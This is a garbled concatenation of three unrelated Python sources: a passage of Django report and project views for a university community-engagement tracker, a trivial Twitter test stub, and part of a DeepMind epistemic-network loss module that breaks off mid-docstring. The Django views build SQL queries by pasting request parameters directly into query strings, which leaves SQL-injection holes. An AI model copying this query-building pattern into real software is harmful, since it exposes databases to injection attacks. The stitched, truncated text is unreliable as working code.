= CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_cond) campus_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) K12_filter = request.GET.get('k12_flag', None) if K12_filter is None or K12_filter == "All" or K12_filter == '': K12_filter_cond = '%' elif K12_filter == 'Yes': K12_filter_cond = 't' elif K12_filter == 'No': K12_filter_cond = 'f' cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_comm_part_cond = '%' cec_camp_part_cond = '%' elif cec_part_selection == "CURR_COMM": cec_comm_part_cond = 'Current' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_COMM": cec_comm_part_cond = 'Former' cec_camp_part_cond = '%' elif cec_part_selection == "FORMER_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Former' elif cec_part_selection == "CURR_CAMP": cec_comm_part_cond = '%' cec_camp_part_cond = 'Current' params = [eng_type_cond, mission_type_cond, community_type_cond, campus_partner_cond, college_unit_cond, K12_filter_cond, academic_start_year_cond, academic_end_year_cond, cec_comm_part_cond, cec_camp_part_cond] cursor = connection.cursor() project_start_query = "select distinct p.project_name \ , array_agg(distinct hm.mission_name) mission_area \ , array_agg(distinct pc.name) CommPartners \ , array_agg(distinct c.name) CampPartners \ , array_agg(distinct e.name) engagement_type \ , pa.academic_year \ , p.semester \ , status.name status \ , case when p.start_date is null then 'None' end start_date \ , case when p.end_date is null then 'None' end end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name activity_type \ , p.description \ , p.project_type project_type \ , p.end_semester end_semester \ , ea.academic_year end_academic_year \ , array_agg(distinct s.sub_category) sub_category \ , p.campus_lead_staff campus_lead_staff \ , hm.mission_image_url mission_image \ , p.other_activity_type act_type \ , p.other_sub_category other_subCat \ , array_agg(s.sub_category_tags) sub_tags \ from projects_project p \ join projects_projectmission m on p.id = m.project_name_id and lower(m.mission_type) = 'primary' \ left join home_missionarea hm on hm.id = m.mission_id \ left join projects_engagementtype e on e.id = p.engagement_type_id \ left join projects_projectcommunitypartner pp on p.id = pp.project_name_id \ left join partners_communitypartner pc on pp.community_partner_id = pc.id \ left join projects_projectcampuspartner pp2 on p.id = pp2.project_name_id \ left join partners_campuspartner c on pp2.campus_partner_id = c.id \ left join projects_academicyear pa on p.academic_year_id = pa.id \ left join projects_academicyear ea on p.end_academic_year_id = ea.id \ left join projects_activitytype a on p.activity_type_id = a.id \ left join projects_projectsubcategory psub on psub.project_name_id = p.id \ left join projects_subcategory s on psub.sub_category_id = s.id \ left join projects_status status on status.id = p.status_id \ where status.name != 'Drafts' \ and ((p.academic_year_id <= " + str(academic_start_year_cond) + ") AND \ (COALESCE(p.end_academic_year_id, p.academic_year_id) >= " + str(academic_end_year_cond) + ")) " clause_query = " " if eng_type_cond !='%': clause_query +=" and e.id::text like '"+ eng_type_cond +"'" if mission_type_cond !='%': clause_query += " and m.mission_id::text like '"+ mission_type_cond + "'" if campus_partner_cond !='%': clause_query += " and pp2.campus_partner_id::text like '" + campus_partner_cond +"'" if college_unit_cond != '%': clause_query +=" and c.college_name_id::text like '" + college_unit_cond +"' " if K12_filter_cond !='%': clause_query +=" and p.k12_flag = '" + K12_filter_cond + "'" if community_type_cond != '%': clause_query += " and pc.community_type_id::text like '" + community_type_cond + "'" if cec_camp_part_cond != '%': clause_query += " and c.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_camp_part_cond + "')" if cec_comm_part_cond != '%': clause_query += " and pc.cec_partner_status_id in (select id from partners_cecpartnerstatus where name like '" + cec_comm_part_cond + "')" project_end_query = project_start_query + clause_query +" group by p.project_name \ , pa.academic_year \ , p.semester \ , status.name \ , p.start_date \ , p.end_date \ , p.outcomes \ , p.total_uno_students \ , p.total_uno_hours \ , p.total_uno_faculty \ , p.total_k12_students \ , p.total_k12_hours \ , p.total_other_community_members \ , a.name \ , p.description \ , project_type \ , end_semester \ , end_academic_year \ , campus_lead_staff \ , mission_image \ , act_type \ , other_subCat \ order by pa.academic_year desc; " cursor.execute(project_end_query) cec_part_choices = CecPartChoiceForm(initial={'cec_choice': cec_part_selection}) print("CEC partner condition: ", cec_part_selection) if selectedprojectId is not None: if selectedprojectId.find(",") != -1: project_name_list = selectedprojectId.split(",") print('project_name_list: ', str(tuple(project_name_list))) cursor.execute(sqlfiles.showSelectedProjects(tuple(project_name_list)), params=None) # cursor.execute(sql.search_projects_sql,str(tuple(project_name_list))) else: projId = "(" + str(selectedprojectId) + ")" print('project_name_list--', projId) cursor.execute(sqlfiles.showSelectedProjects(projId), params=None) for obj in cursor.fetchall(): proj_names = obj[0] name = '' Projectname = proj_names.split(':') if len(Projectname) >= 2 and Projectname[1]: for i in range(0, len(Projectname) - 1): name += Projectname[i] else: for i in Projectname: name = name + str(i) print ("Project name is-----", name) projects_list.append({"name": name, "projmisn": obj[1],"comm_part": obj[2], "camp_part": obj[3],"engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7],"startDate": obj[8], "endDate": obj[9],"outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13],"total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[19] , "end_semester": obj[20], "end_academic_year" : obj[21], "sub_category" : obj[22], "campus_lead_staff": obj[23], "mission_image": obj[24], "other_activity_type": obj[25], "other_sub_category": obj[26], "sub_tags": obj[27] }) page = request.GET.get('page', 1) get_copy = request.GET.copy() parameters = get_copy.pop('page', True) and get_copy.urlencode() cursor.close() return render(request, 'reports/projectsprivatetableview.html', {'project': projects_list, 'data_definition':data_definition, "missions": missions, "communityPartners": communityPartners, 'campus_filter': campus_filter, 'college_filter': campusPartners, 'campus_id': campus_id, 'k12_choices': k12_choices, 'k12_selection': k12_selection, 'cec_part_choices': cec_part_choices, 'cec_part_selection': cec_part_selection,'projects': project_filter,'parameters':parameters}) #Project private reports card and table view end here. def communityPublicReport(request): community_dict = {} community_list = [] data_list=[] legislative_choices = [] legislative_search = '' data_definition=DataDefinition.objects.all() communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) project_filter = ProjectFilter(request.GET, queryset=Project.objects.all()) status_draft = Status.objects.filter(name='Drafts') comm_ids = request.GET.get('comm_ids', None) legislative_selection = request.GET.get('legislative_value', None) if legislative_selection is None: legislative_selection = 'All' for i in range(1,50): legistalive_val = 'Legislative District '+str(i) legislative_choices.append(legistalive_val) if legislative_selection is not None and legislative_selection != 'All': if legislative_selection == '-1': legislative_search ='%' else: legislative_search = legislative_selection.split(" ")[2] college_partner_filter = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) college_value = request.GET.get('college_name', None) if college_value is None or college_value == "All" or college_value == '': campus_filter_qs = CampusPartner.objects.all() else: campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_value) campus_project_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_filter) campus_project_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] if legislative_selection is None or legislative_selection == "All" or legislative_selection == '': legislative_district_cond = '%' else: legislative_district_cond = legislative_search community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs =[] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year-1) + "-" + str(year )[-2:] else: a_year = str(year - 2) + "-" + str(year-1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = -1 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) #cec_part_selection = request.GET.get('weitz_cec_part', None) # cec_part_init_selection = "All" cec_part_selection = request.GET.get('weitz_cec_part', None) # cec_part_init_selection = "All" if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_part_cond = '%' # cursor.execute(sql.projects_report, [project_ids]) elif cec_part_selection == "CURR_COMM": cec_part_cond = 'Current' elif cec_part_selection == "FORMER_COMM": cec_part_cond = 'Former' if comm_ids is not None: params = [] if comm_ids.find(",") != -1: comm_list = comm_ids.split(",") params.append(tuple(comm_list)) cursor = connection.cursor() cursor.execute(sql.selected_community_public_report, params) else: params.append(str(comm_ids)) cursor = connection.cursor() cursor.execute(sql.selected_One_community_public_report, params) else: params = [community_type_cond, academic_start_year_cond, academic_end_year_cond, campus_partner_cond, legislative_district_cond, college_unit_cond, cec_part_cond] cursor = connection.cursor() cursor.execute(sql.community_public_report, params) cec_part_choices = OommCecPartChoiceForm(initial={'cec_choice': cec_part_selection}) for obj in cursor.fetchall(): proj_ids = obj[6] proj_idList = '' if proj_ids is not None: name_count = 0 if len(proj_ids) > 0: for i in proj_ids: proj_idList = proj_idList + str(i) if name_count < len(proj_ids) - 1: proj_idList = proj_idList + str(",") name_count = name_count + 1 data_list.append({"community_name": obj[0], "community_mission":obj[1],"project_count": obj[2], "project_id_list": proj_idList, "website": obj[3], "CommStatus": obj[4]}) cursor.close() return render(request, 'reports/community_public_view.html', { 'college_filter': college_partner_filter, 'campus_filter': campus_project_filter, 'project_filter': project_filter, 'legislative_choices':legislative_choices, 'legislative_value':legislative_selection, 'communityPartners': communityPartners, 'community_list': community_list, 'communityData': data_list, 'data_definition':data_definition, 'campus_id':campus_id, 'cec_part_choices': cec_part_choices}) @login_required() def communityPrivateReport(request): community_dict = {} data_list = [] community_list = [] legislative_choices = [] legislative_search = '' # comp_part_contact = [] data_definition=DataDefinition.objects.all() project_filter = ProjectFilter(request.GET, queryset=Project.objects.all()) communityPartners = communityPartnerFilter(request.GET, queryset=CommunityPartner.objects.all()) #set legislative_selection on template choices field -- Manu Start legislative_selection = request.GET.get('legislative_value', None) if legislative_selection is None: legislative_selection = 'All' # legislative_choices.append('All') for i in range(1,50): legistalive_val = 'Legislative District '+str(i) legislative_choices.append(legistalive_val) if legislative_selection is not None and legislative_selection != 'All': if legislative_selection == '-1': legislative_search ='%' else: legislative_search = legislative_selection.split(" ")[2] college_partner_filter = CampusFilter(request.GET, queryset=CampusPartner.objects.all()) project_filtered_ids = project_filter.qs.values_list('id', flat=True) college_unit_filter = request.GET.get('college_name', None) if college_unit_filter is None or college_unit_filter == "All" or college_unit_filter == '': college_unit_cond = '%' campus_filter_qs = CampusPartner.objects.all() else: college_unit_cond = college_unit_filter campus_filter_qs = CampusPartner.objects.filter(college_name_id=college_unit_filter) campus_project_filter = [{'name': m.name, 'id': m.id} for m in campus_filter_qs] if legislative_selection is None or legislative_selection == "All" or legislative_selection == '': legislative_district_cond = '%' else: legislative_district_cond = legislative_search community_type_filter = request.GET.get('community_type', None) if community_type_filter is None or community_type_filter == "All" or community_type_filter == '': community_type_cond = '%' else: community_type_cond = community_type_filter academic_year_filter = request.GET.get('academic_year', None) acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year-1) + "-" + str(year )[-2:] else: a_year = str(year - 2) + "-" + str(year-1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academic_year_filter is None or academic_year_filter == '': academic_start_year_cond = int(default_yr_id) academic_end_year_cond = int(default_yr_id) elif academic_year_filter == "All": academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 else: academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) campus_partner_filter = request.GET.get('campus_partner', None) if campus_partner_filter is None or campus_partner_filter == "All" or campus_partner_filter == '': campus_partner_cond = '%' campus_id = 0 else: campus_partner_cond = campus_partner_filter campus_id = int(campus_partner_filter) cec_part_selection = request.GET.get('weitz_cec_part', None) # cec_part_init_selection = "All" if cec_part_selection is None or cec_part_selection == "All" or cec_part_selection == '': # cec_part_selection = cec_part_init_selection cec_part_cond = '%' # cursor.execute(sql.projects_report, [project_ids]) elif cec_part_selection == "CURR_COMM": cec_part_cond = 'Current' elif cec_part_selection == "FORMER_COMM": cec_part_cond = 'Former' params = [community_type_cond, academic_start_year_cond, academic_end_year_cond, campus_partner_cond, legislative_district_cond, college_unit_cond, cec_part_cond] cursor = connection.cursor() cursor.execute(sql.community_private_report, params) cec_part_choices = OommCecPartChoiceForm(initial={'cec_choice': cec_part_selection}) for obj in cursor.fetchall(): proj_ids = obj[4] proj_idList = '' sum_uno_students = 0 sum_uno_hours = 0 if proj_ids is not None: name_count = 0 if len(proj_ids) > 0: for i in proj_ids: cursor.execute("Select p.total_uno_students , p.total_uno_hours from projects_project p where p.id=" + str(i)) for obj1 in cursor.fetchall(): sum_uno_students = sum_uno_students + obj1[0] sum_uno_hours = sum_uno_hours + obj1[1] proj_idList = proj_idList + str(i) if name_count < len(proj_ids) - 1: proj_idList = proj_idList + str(",") name_count = name_count + 1 data_list.append({"CommunityName": obj[0], "mission":obj[1],"Projects": obj[2], "numberofunostudents": sum_uno_students, "unostudentshours": sum_uno_hours, "website": obj[3], "proj_id_list": proj_idList, "CommStatus": obj[5]}) cursor.close() return render(request, 'reports/community_private_view.html', {'college_filter': college_partner_filter,'project_filter': project_filter,'data_definition':data_definition, 'legislative_choices':legislative_choices, 'legislative_value':legislative_selection, 'communityPartners': communityPartners, 'community_list': community_list, 'communityData': data_list, 'campus_filter': campus_project_filter, 'campus_id':campus_id, 'cec_part_choices': cec_part_choices}) # project duplication check def checkProject(request): data_list = [] flag = 0 data_definition = DataDefinition.objects.all() academic_yr_filter = AcademicYear.objects.all().order_by('-academic_year') campus_filter = CampusPartner.objects.all() Community_filter = CommunityPartner.objects.all() if request.method == 'POST': flag = 0 projectName = request.POST['projectName'].strip() communityPartner = request.POST['communityPartner'] if communityPartner == 'All': communityPartner_id = -1 else: communityPartner_id = 0 campusPartner = request.POST['campusPartner'] if campusPartner == 'All': campusPartner_id = -1 else: campusPartner_id = 0 academicYear = request.POST['academicYear'] acad_years = AcademicYear.objects.all() yrs = [] month = datetime.datetime.now().month year = datetime.datetime.now().year if month > 7: a_year = str(year - 1) + "-" + str(year)[-2:] else: a_year = str(year - 2) + "-" + str(year - 1)[-2:] for e in acad_years: yrs.append(e.id) try: acad_year = AcademicYear.objects.get(academic_year=a_year).id default_yr_id = acad_year except AcademicYear.DoesNotExist: default_yr_id = max(yrs) max_yr_id = max(yrs) if academicYear is None or academicYear == '': academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 # academic_start_year_cond = int(default_yr_id) # academic_end_year_cond = int(default_yr_id) acad_id = 0 elif academicYear == "All" : academic_start_year_cond = int(max_yr_id) academic_end_year_cond = 1 acad_id = -1 else: academic_year_filter = AcademicYear.objects.get(academic_year=academicYear).id academic_start_year_cond = int(academic_year_filter) academic_end_year_cond = int(academic_year_filter) acad_id = 0 commpart_filter = communityPartner.replace('All', '') camp_filter = campusPartner.replace('All', '') acad_filter = academicYear.replace('All', '') # academic_filter_qs = AcademicYear.objects.get(academic_year=academicYear) # acad = academic_filter_qs.id # acad_id = str(acad) # # acad_id = [m.id for m in academic_filter_qs] # print(acad_id) cursor = connection.cursor() cursor.execute(sqlfiles.checkProjectsql(projectName, commpart_filter, camp_filter, academic_start_year_cond,academic_end_year_cond ), params=None) rows = cursor.fetchall() # print(rows[0][0]) if (rows != []): for obj in rows: proj_names = obj[0] name = '' try: Projectname = proj_names.split(':') except ValueError: name = Projectname else: for i in range(0, len(Projectname) - 1): name += Projectname[i] proj_ids = obj[4] proj_idList = '' if proj_ids is not None: name_count = 0 if len(proj_ids) > 0: for i in proj_ids: proj_idList = proj_idList + str(i) if name_count < len(proj_ids) - 1: proj_idList = proj_idList + str(",") name_count = name_count + 1 comm_part = obj[1] comm_partList = '' if comm_part is not None: name_count = 0 if len(comm_part) > 0: for i in comm_part: comm_partList = comm_partList + str(i) if name_count < len(comm_part) - 1: comm_partList = comm_partList + str(",") name_count = name_count + 1 camp_part = obj[3] camp_partList = '' if camp_part is not None: name_count = 0 if len(camp_part) > 0: for i in camp_part: camp_partList = camp_partList + str(i) if name_count < len(camp_part) - 1: camp_partList = camp_partList + str(",") name_count = name_count + 1 if (projectName.strip().lower() in obj[0].split("(")[0].strip().lower()): flag = 2 if (projectName.strip().lower() == obj[0].split("(")[0].strip().lower()): flag = 1 data_list.append( {"projectName": name, "communityPartner": comm_partList, "campusPartner": camp_partList, "academicYear": obj[2], "project_ids": proj_idList, 'flagBit': flag}) return render(request, 'projects/checkProject.html', {'data_list': data_list, "projectName": projectName, 'flagBit': flag, 'data_definition': data_definition, 'academic_yr_filter': academic_yr_filter, 'campus_filter': campus_filter, 'communityPartner_id': communityPartner_id, "Community_filter": Community_filter, 'communityPartner_selected': communityPartner, 'campusPartner_selected': campusPartner, 'campusPartner_id': campusPartner_id, 'academicYear_selected': academicYear, 'acad_id': acad_id }) else: data_list.append({"projectName": "", "communityPartner": "", "campusPartner": "", "academicYear": "", "project_ids": "", 'flagBit': flag}) return render(request, 'projects/checkProject.html', {'data_list': data_list, "projectName": projectName, 'flagBit': flag, 'data_definition': data_definition, 'academic_yr_filter': academic_yr_filter, 'campus_filter': campus_filter, "Community_filter": Community_filter, 'communityPartner_selected': communityPartner, 'campusPartner_selected': campusPartner, 'academicYear_selected': academicYear }) else: return render(request, 'projects/checkProject.html', {'data_list': data_list, 'data_definition': data_definition, 'academic_yr_filter': academic_yr_filter, 'campus_filter': campus_filter, "Community_filter": Community_filter}) @login_required() # @campuspartner_required() def project_total_Add(request): mission_details = modelformset_factory(ProjectMission, form=ProjectMissionFormset) secondary_mission_details = modelformset_factory(ProjectMission, extra=1, form=ScndProjectMissionFormset) sub_category = modelformset_factory(ProjectSubCategory, extra=1, form=AddSubCategoryForm) proj_comm_part = modelformset_factory(ProjectCommunityPartner, extra=1, form=AddProjectCommunityPartnerForm) proj_campus_part = modelformset_factory(ProjectCampusPartner, extra=1, form=AddProjectCampusPartnerForm) data_definition=DataDefinition.objects.all() if request.method == 'POST': # cache.clear() project = ProjectFormAdd(request.POST) course = CourseForm(request.POST) formset = mission_details(request.POST or None, prefix='mission') categoryformset = sub_category(request.POST or None, prefix='sub_category') formset4 = secondary_mission_details(request.POST or None, prefix='secondary_mission') formset2 = proj_comm_part(request.POST or None, prefix='community') formset3 = proj_campus_part(request.POST or None, prefix='campus') # print("validation ststus:",project.is_valid() , formset.is_valid() ,course.is_valid() , formset2.is_valid()) if project.is_valid() and formset.is_valid() and course.is_valid() and formset2.is_valid() and formset3.is_valid() and formset4.is_valid() and categoryformset.is_valid(): ##Convert address to cordinates and save the legislatve district and household income a = 0 project.total_uno_hours = a proj = project.save() proj.project_name = proj.project_name + " :" + str(proj.academic_year) eng = str(proj.engagement_type) if eng == "Service Learning": course = course.save(commit=False) course.project_name = proj course.save() address = proj.address_line1 address = proj.address_line1 # if (address != "N/A"): # check if a community partner's address is there # fulladdress = proj.address_line1 + ' ' + proj.city # geocode_result = gmaps.geocode(fulladdress) # get the coordinates # proj.latitude = geocode_result[0]['geometry']['location']['lat'] # proj.longitude = geocode_result[0]['geometry']['location']['lng'] # #### checking lat and long are incorrect # if (proj.latitude == '0') or (proj.longitude == '0'): # project = ProjectFormAdd() # course = CourseForm() # formset = mission_details(queryset=ProjectMission.objects.none()) # formset4 = secondary_mission_details(queryset=ProjectMission.objects.none()) # # formset2 = proj_comm_part(queryset=ProjectCommunityPartner.objects.none()) # formset3 = proj_campus_part(queryset=ProjectCampusPartner.objects.none()) # return render(request, 'projects/createProject.html', # {'project': project, 'formset': formset, 'formset4': formset4, 'formset3': formset3, # 'course': course}) # proj.save() # coord = Point([proj.longitude, proj.latitude]) # for i in range(len(district)): # iterate through a list of district polygons # property = district[i] # polygon = shape(property['geometry']) # get the polygons # if polygon.contains(coord): # check if a partner is in a polygon # proj.legislative_district = property["id"] # assign the district number to a partner # proj.save() # for m in range(len(countyData)): # iterate through the County Geojson # properties2 = countyData[m] # polygon = shape(properties2['geometry']) # get the polygon # if polygon.contains(coord): # check if the partner in question belongs to a polygon # proj.county = properties2['properties']['NAME'] # proj.median_household_income = properties2['properties']['Income'] # proj.save() mission_form = formset.save(commit=False) secondary_mission_form = formset4.save(commit=False) proj_comm_form = formset2.save(commit=False) sub_cat_form = categoryformset.save(commit=False) proj_campus_form = formset3.save(commit=False) for k in proj_comm_form: k.project_name = proj k.save() for cat in sub_cat_form: cat.project_name = proj cat.save() for form in mission_form: form.project_name = proj #print("in add mission") form.mission_type = 'Primary' form.save() for form4 in secondary_mission_form: form4.project_name = proj #print("in add secondary mission") form4.mission_type = 'Other' form4.save() # projh = Project.objects.get(pk=project_name_id.pk) init = 0 t = 0 for c in proj_campus_form: c.project_name = proj c.save() # init = proj.total_uno_hours t += c.total_hours * c.total_people proj.total_uno_hours = t proj.save() projects_list = [] camp_part_names = [] p = 0 # Get the campus partner id related to the user camp_part_user = CampusPartnerUser.objects.filter(user_id=request.user.id) for c in camp_part_user: p = c.campus_partner_id # get all the project names base on the campus partner id proj_camp = list(ProjectCampusPartner.objects.filter(campus_partner_id=p)) for f in proj_camp: k = list(Project.objects.filter(id=f.project_name_id)) for x in k: projmisn = list(ProjectMission.objects.filter(project_name_id=x.id)) sub = list(ProjectSubCategory.objects.filter(project_name_id=x.id)) cp = list(ProjectCommunityPartner.objects.filter(project_name_id=x.id)) proj_camp_par = list(ProjectCampusPartner.objects.filter(project_name_id=x.id)) for proj_camp_par in proj_camp_par: camp_part = CampusPartner.objects.get(id=proj_camp_par.campus_partner_id) camp_part_names.append(camp_part) list_camp_part_names = camp_part_names camp_part_names = [] data = {'pk': x.pk, 'name': x.project_name, 'engagementType': x.engagement_type, 'activityType': x.activity_type, 'academic_year': x.academic_year, 'facilitator': x.facilitator, 'semester': x.semester, 'status': x.status, 'description': x.description, 'startDate': x.start_date, 'endDate': x.end_date, 'total_uno_students': x.total_uno_students, 'total_uno_hours': x.total_uno_hours, 'total_k12_students': x.total_k12_students, 'total_k12_hours': x.total_k12_hours, 'total_uno_faculty': x.total_uno_faculty, 'total_other_community_members': x.total_other_community_members, 'outcomes': x.outcomes, 'total_economic_impact': x.total_economic_impact, 'projmisn': projmisn, 'cp': cp, 'sub':sub, 'camp_part': list_camp_part_names } projects_list.append(data) return render(request, 'projects/projectadd_done.html', {'project': projects_list}) else: project = ProjectFormAdd() course = CourseForm() formset = mission_details(queryset=ProjectMission.objects.none(), prefix='mission') formset4 = secondary_mission_details(queryset=ProjectMission.objects.none(), prefix='secondary_mission') formset2 = proj_comm_part(queryset=ProjectCommunityPartner.objects.none(), prefix='community') formset3 = proj_campus_part(queryset=ProjectCampusPartner.objects.none(), prefix='campus') return render(request, 'projects/projectadd.html', {'project': project, 'formset': formset, 'formset3': formset3, 'course': course,'data_definition':data_definition, 'formset2': formset2, 'formset4': formset4}) ###my drafts @login_required() def myDrafts(request): projects_list=[] data_definition=DataDefinition.objects.all() created_by_user= request.user.email created_by= home.models.User.objects.filter(email=created_by_user) project_created = Project.objects.filter(created_by__in= created_by) project_created_by = [p.id for p in project_created] project_updated = Project.objects.filter(updated_by__in=created_by) project_updated_by = [p.id for p in project_updated] camp_part_user = CampusPartnerUser.objects.filter(user_id = request.user.id) camp_part_id = camp_part_user.values_list('campus_partner_id', flat=True) proj_camp = ProjectCampusPartner.objects.filter(campus_partner__in=camp_part_id) project_ids = [project.project_name_id for project in proj_camp] ids = list(set(project_ids).union(project_created_by).union(project_updated_by)) if request.user.is_superuser == True: ids = [project.id for project in Project.objects.all()] cursor = connection.cursor() cursor.execute(sql.my_drafts, [ids]) for obj in cursor.fetchall(): projects_list.append( {"name": obj[0].split("(")[0], "projmisn": obj[1], "comm_part": obj[2], "camp_part": obj[3], "engagementType": obj[4], "academic_year": obj[5], "semester": obj[6], "status": obj[7], "startDate": obj[8], "endDate": obj[9], "outcomes": obj[10], "total_uno_students": obj[11], "total_uno_hours": obj[12], "total_uno_faculty": obj[13], "total_k12_students": obj[14], "total_k12_hours": obj[15], "total_other_community_members": obj[16], "activityType": obj[17], "description": obj[18], "project_type": obj[20], "pk":obj[19] , "end_semester": obj[21], "end_academic_year": obj[22], "sub_category": obj[23], "campus_lead_staff": obj[24], "mission_image": obj[25], "other_activity_type": obj[26], "other_sub_category":obj[27]}) return render(request, 'projects/myDrafts.html', {'project': projects_list, 'data_definition':data_definition}) @login_required() def drafts_delete(request,pk): draft_delete = get_object_or_404(Project, pk=pk) draft_delete.delete() return HttpResponseRedirect("/myDrafts") def draft_project_done(request): return render(request, 'projects/draftadd_done.html') def submit_project_done(request): return render(request, 'projects/confirmAddProject.html') def adminsubmit_project_done(request): return render(request, 'projects/adminconfirm.html') # -*- coding: utf-8 -*- from unittest import TestCase class TestTwitter(TestCase): def test_test(self): self.assertEqual(True, True) # pylint: disable=g-bad-file-header # Copyright 2021 DeepMind Technologies Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Helpful losses for the ENN agent.""" from typing import Callable, Optional from enn import base as enn_base from enn import data_noise from enn import losses from neural_testbed import base as testbed_base EnnCtor = Callable[[testbed_base.PriorKnowledge], enn_base.EpistemicNetwork] LossCtor = Callable[ [testbed_base.PriorKnowledge, enn_base.EpistemicNetwork], enn_base.LossFn] def default_enn_prior_loss(num_index_samples: int = 10) -> LossCtor: def prior_loss_ctor(prior: testbed_base.PriorKnowledge, enn: enn_base.EpistemicNetwork) -> enn_base.LossFn: del enn if prior.num_classes > 1: return losses.ClassificationPriorLoss(num_index_samples) else: return losses.RegressionPriorLoss(num_index_samples) return prior_loss_ctor def default_enn_loss(num_index_samples: int = 10, distribution: str = 'none', seed: int = 0, weight_reg_scale: Optional[float] = None) -> LossCtor: """Constructs a default loss suitable for classification or regression.""" def loss_ctor(prior: testbed_base.PriorKnowledge, enn: enn_base.EpistemicNetwork) -> enn_base.LossFn: # Construct L2 or Xent loss based on regression/classification. if prior.num_classes > 1: single_loss = losses.combine_single_index_losses_as_metric( train_loss=losses.XentLoss(prior.num_classes), extra_losses={'acc': losses.AccuracyErrorLoss(prior.num_classes)}, ) else: single_loss = losses.L2Loss() # Add bootstrapping boot_fn = data_noise.BootstrapNoise(enn, distribution, seed) single_loss = losses.add_data_noise(single_loss, boot_fn) loss_fn = losses.average_single_index_loss(single_loss, num_index_samples) # Add L2 weight decay if weight_reg_scale: scale = (weight_reg_scale ** 2) / (2. * prior.num_train) loss_fn = losses.add_l2_weight_decay(loss_fn, scale=scale) return loss_fn return loss_ctor def gaussian_regression_loss(num_index_samples: int, noise_scale: float = 1, l2_weight_decay: float = 0, exclude_bias_l2: bool = True) -> LossCtor: """Add a matching Gaussian noise to the target y.""" def loss_ctor(prior: testbed_base.PriorKnowledge, enn: enn_base.EpistemicNetwork) -> enn_base.LossFn: """Add a matching Gaussian noise to the target y.""" noise_std = noise_scale * prior.noise_std noise_fn = data_noise.GaussianTargetNoise(enn, noise_std) single_loss = losses.add_data_noise(losses.L2Loss(), noise_fn) loss_fn = losses.average_single_index_loss(single_loss, num_index_samples) if l2_weight_decay != 0: if exclude_bias_l2: predicate = lambda module, name, value: name != 'b' else: predicate = lambda module, name, value: True loss_fn = losses.add_l2_weight_decay(loss_fn, l2_weight_decay, predicate) return loss_fn return loss_ctor def regularized_dropout_loss(num_index_samples: int = 10, dropout_rate: float = 0.05, scale: float = 1e-2, tau: float = 1.0) -> LossCtor: """Constructs the special regularized loss of the paper "Dropout as 